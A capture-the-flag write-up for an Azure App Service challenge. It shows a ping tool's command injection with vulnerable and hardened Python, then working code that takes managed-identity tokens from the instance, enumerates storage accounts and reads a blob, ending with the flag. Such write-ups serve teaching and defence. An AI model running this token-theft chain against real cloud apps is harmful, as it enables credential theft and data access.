Managed Secrets
Medium
500
3
Description
Today in school, I learnt how to create a website with Python! There is also the networking lesson where I learn the ping command...
PS: the flag is not in the instance :)
https://lncctf2023-webapp.azurewebsites.net
Hints: Are there any internal services/endpoint running by default?
Visiting the site shows an Azure App Service web app running.

The web app pings whatever IP address or URL you give it. This is a very classic command injection challenge: the user input ends up on a shell command line, so appending a second command to the address gives code execution on the App Service instance straight away.
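The bug class described above, as an added example that is not the challenge's own source (which was never published here): a "ping whatever you type" handler in its vulnerable form next to a hardened version. The function names and the fake `runner` hook are assumptions made for this illustration.

```python
import ipaddress
import re
import subprocess


def ping_vulnerable(host: str) -> str:
    """Vulnerable form: the user-controlled host is interpolated into a shell
    command line, so a value such as "8.8.8.8; id" runs `id` as well."""
    completed = subprocess.run(f"ping -c 1 {host}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout + completed.stderr


# RFC 1123 host name: dot-separated labels of letters, digits and hyphens.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def is_valid_target(host: str) -> bool:
    """Allow-list check: an IPv4/IPv6 literal or a syntactic host name.
    Shell metacharacters, whitespace and a leading '-' (option injection)
    all fail this check."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return _HOSTNAME_RE.fullmatch(host) is not None


def ping_hardened(host: str, runner=subprocess.run) -> str:
    """Hardened form: validate first, then pass an argv list with no shell so
    the value can only ever be a single argument to ping. `runner` is a hook
    (assumed, for testing) that defaults to subprocess.run."""
    if not is_valid_target(host):
        raise ValueError(f"refusing to ping {host!r}")
    completed = runner(["ping", "-c", "1", host],
                       capture_output=True, text=True, timeout=10)
    return completed.stdout + completed.stderr
```

Note that the validation alone is not the fix: removing `shell=True` is what stops the interpreter from parsing the input, and the allow-list additionally blocks option injection (a host starting with `-`), which argv lists do not prevent on their own.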

Since I now have code execution, I can have the app service request a management token from its managed-identity endpoint, referring to HackTricks. On App Service this is not the 169.254.169.254 IMDS used by VMs but a local endpoint whose address and secret the platform injects into the environment as IDENTITY_ENDPOINT and IDENTITY_HEADER; the token request is a GET with the secret passed in the X-IDENTITY-HEADER header.

I am able to authenticate using the access token together with the client_id value returned alongside it.

Next, I enumerate the resources this service principal (the app's managed identity) has access to.

I am then able to retrieve the flag from the storage account.
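The rest of the chain, written as an added Python example that is not part of the original writeup: it requests a token from the App Service identity endpoint, lists subscriptions and storage accounts through the ARM API, then reads a blob with a second token scoped to storage.azure.com. The identity endpoint request format, the ARM API versions and the blob request header are real; the subscription ID, storage account name, container, blob path and every response in `demo()` are constructed so the chain runs offline. Reading the blob with a storage.azure.com token assumes the identity holds a data-plane role on the account (the other route, listing the account keys through ARM, is not shown).

```python
import base64
import json
import os
import urllib.parse
import urllib.request

ARM_RESOURCE = "https://management.azure.com/"
STORAGE_RESOURCE = "https://storage.azure.com/"


def http_get(url: str, headers: dict) -> bytes:
    """Plain HTTPS GET. Every function below takes a `get` callable so the
    chain can be exercised against a fake (see demo())."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def identity_token_request(resource: str, env=os.environ):
    """The request the App Service managed-identity endpoint expects: endpoint
    and shared secret come from environment variables the platform injects,
    which is exactly what command injection lets an attacker read and call."""
    query = urllib.parse.urlencode({"resource": resource, "api-version": "2019-08-01"})
    url = env["IDENTITY_ENDPOINT"] + "?" + query
    return url, {"X-IDENTITY-HEADER": env["IDENTITY_HEADER"]}


def get_identity_token(resource: str, env=os.environ, get=http_get):
    url, headers = identity_token_request(resource, env)
    body = json.loads(get(url, headers))
    return body["access_token"], body["client_id"]


def jwt_claims(token: str) -> dict:
    """Decode the payload only (no signature check) to see whose token it is:
    `appid` is the client ID, `xms_mirid` the managed identity's resource ID."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def list_subscriptions(token: str, get=http_get) -> list:
    url = ARM_RESOURCE + "subscriptions?api-version=2020-01-01"
    body = json.loads(get(url, {"Authorization": "Bearer " + token}))
    return [s["subscriptionId"] for s in body["value"]]


def list_storage_accounts(token: str, subscription: str, get=http_get) -> list:
    query = urllib.parse.urlencode(
        {"api-version": "2021-04-01",
         "$filter": "resourceType eq 'Microsoft.Storage/storageAccounts'"},
        quote_via=urllib.parse.quote)
    url = f"{ARM_RESOURCE}subscriptions/{subscription}/resources?{query}"
    body = json.loads(get(url, {"Authorization": "Bearer " + token}))
    return [r["name"] for r in body["value"]]


def read_blob(token: str, account: str, container: str, blob: str, get=http_get) -> str:
    """Read one blob with a storage.azure.com token; needs a data-plane role
    such as Storage Blob Data Reader (assumption for this example)."""
    url = f"https://{account}.blob.core.windows.net/{container}/{blob}"
    headers = {"Authorization": "Bearer " + token, "x-ms-version": "2020-10-02"}
    return get(url, headers).decode()


def _fake_jwt(claims: dict) -> str:
    """Constructed, unsigned token for the offline demo only."""
    def b64(d):
        return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    return f"{b64({'alg': 'none'})}.{b64(claims)}."


def demo() -> str:
    """Run the whole chain against a constructed fake of the three services."""
    env = {"IDENTITY_ENDPOINT": "http://127.0.0.1:41473/msi/token",
           "IDENTITY_HEADER": "constructed-secret"}
    sub, client_id = "00000000-0000-0000-0000-000000000000", "11111111-1111-1111-1111-111111111111"
    tokens = {res: _fake_jwt({"aud": res, "appid": client_id}) for res in (ARM_RESOURCE, STORAGE_RESOURCE)}

    def fake_get(url, headers):
        if url.startswith(env["IDENTITY_ENDPOINT"]):
            assert headers["X-IDENTITY-HEADER"] == env["IDENTITY_HEADER"]
            res = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)["resource"][0]
            return json.dumps({"access_token": tokens[res], "client_id": client_id,
                               "resource": res, "token_type": "Bearer"}).encode()
        if url == ARM_RESOURCE + "subscriptions?api-version=2020-01-01":
            return json.dumps({"value": [{"subscriptionId": sub}]}).encode()
        if f"/subscriptions/{sub}/resources?" in url:
            return json.dumps({"value": [{"name": "lncflagstore",
                                          "type": "Microsoft.Storage/storageAccounts"}]}).encode()
        if url == "https://lncflagstore.blob.core.windows.net/flag/flag.txt":
            assert headers["Authorization"] == "Bearer " + tokens[STORAGE_RESOURCE]
            return b"FLAG{constructed-sample}"
        raise AssertionError("unexpected request " + url)

    arm_token, _ = get_identity_token(ARM_RESOURCE, env, fake_get)
    account = list_storage_accounts(arm_token, list_subscriptions(arm_token, fake_get)[0], fake_get)[0]
    storage_token, _ = get_identity_token(STORAGE_RESOURCE, env, fake_get)
    return read_blob(storage_token, account, "flag", "flag.txt", fake_get)
```

The two-token detail matters in practice: a token minted for management.azure.com is rejected by the blob endpoint, so the identity endpoint has to be called once per audience, and the blob read only works if the identity has a data-plane role on the account rather than just Reader on the resource.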

Flag: LNC2023{h3y_h0w_did_y0u_g3T_thi5}